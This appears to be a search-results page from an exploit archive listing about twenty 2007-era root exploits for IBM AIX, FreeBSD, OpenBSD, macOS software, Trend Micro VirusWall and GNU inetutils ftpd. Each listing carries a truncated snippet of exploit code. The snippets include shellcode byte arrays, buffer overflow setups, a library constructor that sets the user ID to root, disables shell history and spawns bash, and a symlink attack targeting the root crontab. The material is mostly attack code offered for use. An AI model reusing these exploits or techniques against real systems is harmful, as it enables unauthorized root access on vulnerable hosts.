792 matches found
aix53-pioout.txt
!/bin/sh 07/2007: public release echo "-------------------------------" echo " AIX pioout Local Root Exploit " echo " By qaaz" echo "-------------------------------" cat piolib.c include void init attribute constructor; void init seteuid0; setuid0; putenv"HISTFILE=/dev/null"; execl"/bin/bash",...
aix53-capture.txt
/ 07/2007: public release qaaz@aix:$ ./aix-capture -------------------------------- AIX capture Local Root Exploit By qaaz -------------------------------- bash: no job control in this shell bash-3.00 / include include include include include include include define TARGET "/usr/bin/capture" defin...
IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit
Exploit for aix platform in category local exploits =============================================================== IBM AIX include include include include include include define TARGET "/usr/bin/capture" define VALCNT 40 define MAXx,y x y ? x : y define ALIGNx,y x + y - 1 / y y unsigned char...
IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit
No description provided by source. / 07/2007: public release IBM AIX = 5.3 sp6 AIX capture Local Root Exploit By qaaz / include stdio.h include stdlib.h include string.h include fcntl.h include unistd.h include sys/wait.h include sys/select.h define TARGET "/usr/bin/capture" define VALCNT 40 defi...
IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit
Exploit for aix platform in category local exploits ====================================================================== IBM AIX piolib.c include void init attribute constructor; void init seteuid0; setuid0; putenv"HISTFILE=/dev/null"; execl"/bin/bash", "bash", "-i", void 0; execl"/bin/sh", "sh...
IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit
No description provided by source. / 07/2007: public release IBM AIX = 5.3 sp6 AIX ftp Local Root Exploit By qaaz / include stdio.h include stdlib.h include string.h include unistd.h include sys/wait.h include sys/select.h define TARGET "/usr/bin/ftp" define OVERLEN 300 define MAXx,y x y ? x : y...
IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation
/ 07/2007: public release IBM AIX include include include include include include define TARGET "/usr/bin/capture" define VALCNT 40 define MAXx,y x y ? x : y define ALIGNx,y x + y - 1 / y y unsigned char qaazcode = "\x60\x60\x60\x60\x60\x60\x60\x60" "\x7c\x63\x1a\x79\x40\x82\xff\xfd"...
IBM AIX 5.3 SP6 - FTP gets() Local Privilege Escalation
IBM AIX 5.3 SP6 - FTP gets Local Privilege Escalation / 07/2007: public release IBM AIX include include include include include define TARGET "/usr/bin/ftp" define OVERLEN 300 define MAXx,y x y ? x : y define ALIGNx,y x + y - 1 / y y unsigned char qaazcode = "\x60\x60\x60\x60\x60\x60\x60\x60"...
IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation
IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation / 07/2007: public release IBM AIX include include include include include include define TARGET "/usr/bin/capture" define VALCNT 40 define MAXx,y x y ? x : y define ALIGNx,y x + y - 1 / y y unsigned char qaazcode =...
Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
/ Fedora Core 6 exec-shield based Fenice OMS server fenice-1.10.tar.gz remote root exploit by Xpl017Elz Advanced exploitation in exec-shield Fedora Core case study URL: http://x82.inetcop.org/h0me/papers/FCexploit/FCexploit.txt Reference: https://www.securityfocus.com/bid/17678 vendor:...
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation
// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin you 31337!!! ; // thanks to sacrine and all the other netric guys!!! you rule : include include include include define LEN 1264 define NOP 0x90 extern char environ; int main char bufLEN; char ptr; char arg4;...
FreeBSD mcweject 0.9 Eject - Local Buffer Overflow Local Privilege Escalation
FreeBSD mcweject 0.9 Eject - Local Buffer Overflow Local Privilege Escalation // ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin you 31337!!! ; // thanks to sacrine and all the other netric guys!!! you rule : include include include include define LEN 1264...
Netragard Security Advisory 2007-02-20
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Netragard, L.L.C Advisory Strategic Reconnaissance Team ------------------------------------------------ http://www.netragard.com -- "We make I.T. Safe." POSTING NOTICE - ----------------------------------------------------------------------- If you...
McAfee VirusScan for Mac (Virex) <= 7.7 Local Root Exploit
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Following symlinks is bad mmmmmmmmmmkay! $dest = "/var/cron/tabs/root"; $tgts"0" = "Virex 7.7.dmg:"/Library/Application Support/Virex/VShieldExclude.txt" "; unless $target...
Trend Micro VirusWall 3.81 - vscanVSAPI Local Buffer Overflow
Trend Micro VirusWall 3.81 - vscanVSAPI Local Buffer Overflow / Title: Local root exploit for vscan/VSAPI =Trend Micro VirusWall 3.81 on Linux Author: Sebastian Wolfgarten / [email protected] / http://www.devtarget.org Date: January 3rd, 2007 Severity: Medium Description: The product...
OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit
No description provided by source. / Critical Security OpenBSD 3.x-4.0 vgaioctl root exploit Bug had been discovered by allmighty Ilja van Sprundel ilja.netric.org Some code had been stolen from noir's openbsd exploit sources Fix is available:...
OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit
Exploit for bsd platform in category local exploits ================================================ OpenBSD 3.x - 4.0 vgaioctl Local Root Exploit ================================================ / Critical Security OpenBSD 3.x-4.0 vgaioctl root exploit Bug had been discovered by allmighty Ilja v...
ftpd-ldpreload.pl.txt
FTP server GNU inetutils 1.4.2 Remote Root Exploit This program remotely exploits the most recent versions of GNU inetutils ftpd on linux systems. Requirements: 1. There MUST be a chroot'ed environment for the logged in user 2. Directory etc must be writeable by the logged in user duh! The exploi...
Xcode OpenBase <= 10.0.0 (symlink) Local Root Exploit (OSX)
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom = ftp://www.openbase.com/pub/OpenBase10.0 vulnerable ? Create a new file anywhere on the filesystem with rw-rw-rw privs. Sorry you can NOT overwrite existing files. Writin...
Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)
Exploit for macOS platform in category local exploits ====================================================================== Xcode OpenBase \n\nTargets:\n\n"; foreach $key sortkeys %tgts $a,$b = split/:/,$tgts"$key"; print "\t$key . $a - $b\n"; print "\n"; exit 1; $ret = pack"l", $retval; $a,$b =...